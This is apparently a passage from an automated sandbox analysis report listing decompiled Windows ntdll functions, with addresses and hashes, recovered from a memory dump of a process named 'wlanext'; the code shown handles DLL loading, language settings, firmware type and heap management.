                                  0x00000000
                                  0x034f7f0e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034f7eb1

                                  Strings
                                  • minkernel\ntdll\ldrmap.c, xrefs: 035498A2
                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 03549891
                                  • LdrpCompleteMapModule, xrefs: 03549898
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                  • API String ID: 0-1676968949
                                  • Opcode ID: ce6a6f8a86ca5ddf87a216a3bd5e94537320d3efac1432b619729f5699664a1f
                                  • Instruction ID: 47b9128a2dea40a50d3bdd48883ca5ee54b1de8436764605662cea8746cad114
                                  • Opcode Fuzzy Hash: ce6a6f8a86ca5ddf87a216a3bd5e94537320d3efac1432b619729f5699664a1f
                                  • Instruction Fuzzy Hash: 9151FE356007459FD725CB68D844B2ABBA4BB44398F1C05ABEA619F3E1D738E901CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034EE620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E034EE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E034EF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E035295D0();
						}
						if(_t78 != 0) {
							L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0352FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0352BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E03529600();
					if(_t97 < 0) {
						goto L6;
					}
					E0352BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L034EF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0352BB40(_t83, _t102 + 0x24, _t78);
								if(L034F43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0352BB40(_t84, _t102 + 0x24, _t94);
									if(L034F43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                  0x034ee620
                                  0x034ee628
                                  0x034ee62f
                                  0x034ee631
                                  0x034ee635
                                  0x034ee637
                                  0x034ee63e
                                  0x03545503
                                  0x03545503
                                  0x034ee64c
                                  0x034ee64c
                                  0x034ee651
                                  0x00000000
                                  0x00000000
                                  0x034ee661
                                  0x034ee665
                                  0x0354542a
                                  0x034ee715
                                  0x034ee71a
                                  0x034ee71c
                                  0x034ee720
                                  0x034ee720
                                  0x034ee727
                                  0x034ee736
                                  0x034ee736
                                  0x034ee743
                                  0x034ee743
                                  0x034ee673
                                  0x034ee678
                                  0x034ee67d
                                  0x034ee682
                                  0x034ee685
                                  0x034ee692
                                  0x034ee69b
                                  0x034ee6a3
                                  0x034ee6ad
                                  0x034ee6b1
                                  0x034ee6b2
                                  0x034ee6bb
                                  0x034ee6bf
                                  0x034ee6c0
                                  0x034ee6c8
                                  0x034ee6cc
                                  0x034ee6d5
                                  0x034ee6d9
                                  0x00000000
                                  0x00000000
                                  0x034ee6e5
                                  0x034ee6ea
                                  0x034ee6f9
                                  0x034ee70b
                                  0x034ee70f
                                  0x03545439
                                  0x0354545e
                                  0x0354545e
                                  0x00000000
                                  0x0354545e
                                  0x0354543b
                                  0x0354543e
                                  0x03545440
                                  0x03545445
                                  0x03545472
                                  0x03545475
                                  0x0354548d
                                  0x03545493
                                  0x035454a9
                                  0x00000000
                                  0x00000000
                                  0x035454ab
                                  0x035454b4
                                  0x035454bc
                                  0x035454c8
                                  0x035454de
                                  0x035454fb
                                  0x035454e0
                                  0x035454e6
                                  0x035454eb
                                  0x035454eb
                                  0x035454de
                                  0x00000000
                                  0x035454bc
                                  0x03545477
                                  0x0354547a
                                  0x03545480
                                  0x03545483
                                  0x03545486
                                  0x0354548b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0354548b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03545447
                                  0x03545447
                                  0x03545447
                                  0x03545447
                                  0x0354544e
                                  0x00000000
                                  0x00000000
                                  0x03545450
                                  0x03545452
                                  0x03545455
                                  0x0354545a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0354545c
                                  0x0354546a
                                  0x0354546d
                                  0x0354546f
                                  0x00000000
                                  0x0354546f
                                  0x034ee70f

                                  Strings
                                  • @, xrefs: 034EE6C0
                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 034EE68C
                                  • InstallLanguageFallback, xrefs: 034EE6DB
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                  • API String ID: 0-1757540487
                                  • Opcode ID: b74b987e3123476a1c0690f86385194372e89ad5ead130fd4728b01b326253d5
                                  • Instruction ID: 4ad07453fa18f482c7575699e498893fc331a257a9da93f0d5ee73fc318669a4
                                  • Opcode Fuzzy Hash: b74b987e3123476a1c0690f86385194372e89ad5ead130fd4728b01b326253d5
                                  • Instruction Fuzzy Hash: 2151E1765083069BC714DF25E440A6BB3E8BF89619F090D2EF985DB260FB34DA44C7A6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035AE539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 60%
                                  			E035AE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E035ABBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E035ABCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E035AAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E03529730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E035AA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E035AA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E03529730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E035AA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E035AA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E03502280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E034FB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E034FFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E03507D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0359FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                  0x035ae547
                                  0x035ae549
                                  0x035ae54f
                                  0x035ae553
                                  0x035ae557
                                  0x035ae55a
                                  0x035ae55c
                                  0x035ae55f
                                  0x035ae561
                                  0x035ae567
                                  0x035ae56b
                                  0x035ae7e2
                                  0x00000000
                                  0x035ae571
                                  0x035ae575
                                  0x035ae577
                                  0x035ae57b
                                  0x035ae57c
                                  0x035ae57d
                                  0x035ae57e
                                  0x035ae57f
                                  0x035ae588
                                  0x035ae58f
                                  0x035ae591
                                  0x035ae592
                                  0x035ae592
                                  0x035ae596
                                  0x035ae59e
                                  0x035ae5a0
                                  0x035ae5a6
                                  0x035ae61d
                                  0x035ae61d
                                  0x035ae621
                                  0x035ae623
                                  0x035ae630
                                  0x035ae630
                                  0x035ae7e6
                                  0x035ae7eb
                                  0x035ae7ed
                                  0x035ae7f4
                                  0x035ae7fa
                                  0x035ae7ff
                                  0x035ae7ff
                                  0x035ae80a
                                  0x035ae812
                                  0x035ae812
                                  0x035ae5ab
                                  0x035ae5b4
                                  0x035ae5b9
                                  0x035ae5be
                                  0x035ae5c0
                                  0x035ae5c2
                                  0x035ae5c8
                                  0x035ae5c9
                                  0x035ae5cb
                                  0x035ae5cc
                                  0x035ae5d5
                                  0x035ae5e4
                                  0x035ae5f1
                                  0x035ae5f8
                                  0x035ae5f8
                                  0x035ae5d5
                                  0x035ae602
                                  0x035ae616
                                  0x035ae63d
                                  0x035ae644
                                  0x035ae64d
                                  0x035ae652
                                  0x035ae657
                                  0x035ae659
                                  0x035ae65b
                                  0x035ae661
                                  0x035ae662
                                  0x035ae664
                                  0x035ae665
                                  0x035ae66e
                                  0x035ae67d
                                  0x035ae68a
                                  0x035ae691
                                  0x035ae691
                                  0x035ae66e
                                  0x035ae6b0
                                  0x00000000
                                  0x035ae6b6
                                  0x035ae6bd
                                  0x035ae6c7
                                  0x035ae6d7
                                  0x035ae6d9
                                  0x035ae6db
                                  0x035ae6de
                                  0x035ae6e3
                                  0x035ae6f3
                                  0x035ae6fc
                                  0x035ae700
                                  0x035ae700
                                  0x035ae704
                                  0x035ae70a
                                  0x035ae70a
                                  0x035ae713
                                  0x035ae716
                                  0x035ae719
                                  0x035ae720
                                  0x035ae761
                                  0x035ae76b
                                  0x035ae774
                                  0x035ae77a
                                  0x035ae77a
                                  0x035ae78a
                                  0x035ae791
                                  0x035ae799
                                  0x035ae79b
                                  0x035ae79f
                                  0x035ae7aa
                                  0x035ae7c0
                                  0x035ae7ac
                                  0x035ae7b2
                                  0x035ae7b9
                                  0x035ae7b9
                                  0x035ae7c7
                                  0x035ae806
                                  0x00000000
                                  0x035ae7c9
                                  0x035ae7d1
                                  0x035ae7d8
                                  0x00000000
                                  0x035ae7d8
                                  0x00000000
                                  0x00000000
                                  0x035ae722
                                  0x035ae72e
                                  0x035ae748
                                  0x035ae74c
                                  0x035ae754
                                  0x035ae756
                                  0x035ae75c
                                  0x035ae75c
                                  0x00000000
                                  0x035ae75c
                                  0x035ae758
                                  0x035ae758
                                  0x00000000
                                  0x035ae758
                                  0x035ae750
                                  0x00000000
                                  0x00000000
                                  0x035ae752
                                  0x00000000
                                  0x035ae752
                                  0x035ae730
                                  0x035ae735
                                  0x035ae73d
                                  0x035ae73f
                                  0x00000000
                                  0x00000000
                                  0x035ae741
                                  0x035ae741
                                  0x00000000
                                  0x035ae741
                                  0x035ae739
                                  0x00000000
                                  0x00000000
                                  0x035ae73b
                                  0x00000000
                                  0x035ae73b
                                  0x035ae722
                                  0x035ae720
                                  0x035ae6b0
                                  0x035ae618
                                  0x00000000
                                  0x035ae618

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: `$`
                                  • API String ID: 0-197956300
                                  • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                  • Instruction ID: 331048c7d088bf406f4e1b1eabcf8f5908cc1e484c8db25b78589a24fd1fb13a
                                  • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                  • Instruction Fuzzy Hash: 69919E35604B429FE724CE29E842B1BB7E5BFC4714F18892DF595CB2A0E774E804DB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035651BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 77%
                                  			E035651BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x35c05f0);
				E0353D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E034FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E035653CA(0);
						return E0353D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0352F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E03503690(1, _t117, 0x34c1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0352AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L03504620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0352AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0356500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E03529860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                  0x035651be
                                  0x035651c3
                                  0x035651c8
                                  0x035651cd
                                  0x035651d0
                                  0x035651d3
                                  0x035651d8
                                  0x035651db
                                  0x035651de
                                  0x035651e0
                                  0x035651e3
                                  0x035651e6
                                  0x035651e8
                                  0x03565342
                                  0x03565351
                                  0x03565356
                                  0x0356535a
                                  0x03565360
                                  0x03565363
                                  0x03565366
                                  0x03565369
                                  0x03565369
                                  0x0356536b
                                  0x0356536b
                                  0x03565370
                                  0x035653a3
                                  0x035653a4
                                  0x035653a6
                                  0x035653ab
                                  0x035653ab
                                  0x035653ae
                                  0x035653ae
                                  0x035653b5
                                  0x035653bf
                                  0x035653bf
                                  0x03565375
                                  0x03565396
                                  0x035653a0
                                  0x035653a0
                                  0x00000000
                                  0x03565396
                                  0x03565377
                                  0x03565379
                                  0x0356537f
                                  0x0356538c
                                  0x03565390
                                  0x00000000
                                  0x03565390
                                  0x035651ee
                                  0x035651f1
                                  0x03565301
                                  0x03565310
                                  0x03565315
                                  0x03565318
                                  0x0356531b
                                  0x03565320
                                  0x0356532e
                                  0x03565331
                                  0x00000000
                                  0x03565331
                                  0x03565328
                                  0x03565329
                                  0x00000000
                                  0x03565329
                                  0x035651fa
                                  0x03565235
                                  0x03565236
                                  0x03565239
                                  0x0356523f
                                  0x03565240
                                  0x03565241
                                  0x03565242
                                  0x03565246
                                  0x03565247
                                  0x0356524e
                                  0x03565251
                                  0x03565267
                                  0x03565269
                                  0x0356526e
                                  0x0356527d
                                  0x0356527e
                                  0x03565281
                                  0x03565282
                                  0x03565287
                                  0x03565288
                                  0x0356528a
                                  0x0356528f
                                  0x03565294
                                  0x00000000
                                  0x00000000
                                  0x0356529a
                                  0x0356529c
                                  0x0356529e
                                  0x0356529e
                                  0x035652a4
                                  0x035652b0
                                  0x00000000
                                  0x00000000
                                  0x035652ba
                                  0x035652bc
                                  0x035652bc
                                  0x035652d4
                                  0x035652d9
                                  0x035652dc
                                  0x035652e1
                                  0x00000000
                                  0x00000000
                                  0x035652e7
                                  0x035652f4
                                  0x00000000
                                  0x035652f4
                                  0x03565270
                                  0x00000000
                                  0x03565270
                                  0x035651fc
                                  0x035651fd
                                  0x03565202
                                  0x03565203
                                  0x03565205
                                  0x0356520a
                                  0x0356520f
                                  0x00000000
                                  0x00000000
                                  0x0356521b
                                  0x03565226
                                  0x0356522b
                                  0x0356521d
                                  0x0356521d
                                  0x03565222
                                  0x03565222
                                  0x0356522d
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Legacy$UEFI
                                  • API String ID: 2994545307-634100481
                                  • Opcode ID: 16a88cf1d04cd5a47aba5ed6107fddbf801de127650fdbd4f4c55bbfd47158de
                                  • Instruction ID: d35cff04729076d5b3268c0788d195cff7bc3d38bc594b7358a260ea353c2083
                                  • Opcode Fuzzy Hash: 16a88cf1d04cd5a47aba5ed6107fddbf801de127650fdbd4f4c55bbfd47158de
                                  • Instruction Fuzzy Hash: D2518175E407099FDB24DFA8D880AADBBF8FF85700F14482DE549EB261EB719940CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0350B944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E0350B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x35dd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E03507D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E035B8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E03529E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0352B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
